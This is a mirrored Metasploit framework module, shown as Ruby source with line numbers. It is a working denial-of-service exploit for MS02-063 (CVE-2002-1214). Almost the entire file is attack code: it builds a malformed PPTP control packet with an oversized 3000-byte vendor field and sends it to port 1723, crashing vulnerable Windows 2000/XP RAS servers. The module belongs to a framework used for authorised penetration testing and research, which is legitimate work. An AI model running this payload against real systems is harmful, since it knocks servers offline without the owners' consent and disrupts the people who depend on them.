Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name'	=> 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',

15
        'Description'	=> %q{

16
          This module exploits a kernel based overflow when sending abnormal PPTP Control Data

17
          packets	to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers

18
          (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.

19
          Code execution may be possible however this module is only a DoS.

20
        },

21
        'Author' => [ 'aushack' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'BID', '5807' ],

25
          [ 'CVE', '2002-1214' ],

26
          [ 'OSVDB', '13422' ],

27
          [ 'MSB', 'MS02-063' ],

28
        ],

29
        'DisclosureDate' => '2002-09-26',

30
        'Notes' => {

31
          'Stability' => [CRASH_OS_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        Opt::RPORT(1723),

41
      ]

42
    )

43
  end

44


45
  def run

46
    connect

47


48
    # Fields borrowed from Wireshark :)

49
    sploit = "\x00\x9c" # length

50
    sploit << "\x00\x01" # control message

51
    sploit << "\x1a\x2b\x3c\x4d" # cookie

52
    sploit << "\x00\x01" # start control connection req

53
    sploit << "\x00\x00" # reserved

54
    sploit << "\x01\x00" # protocol version

55
    sploit << "\x00\x00" # reserved

56
    sploit << "\x00\x03" # framing capabilities

57
    sploit << "\x00\x00\x00\x02" # bearer capabilities

58
    sploit << "\xff\xff" # max channels

59
    sploit << "\x0a\x28" # firmware revision

60
    sploit << "\x00\x01" # Hostname

61
    sploit << 'A' * 3000 # Vendor - trigger vuln

62


63
    print_status('Sending PPTP DoS Packet...')

64


65
    sock.put(sploit)

66


67
    print_status('Packet sent. Kernel should halt on a Stop Error (BSOD).')

68


69
    disconnect

70
  end

71
end

72


73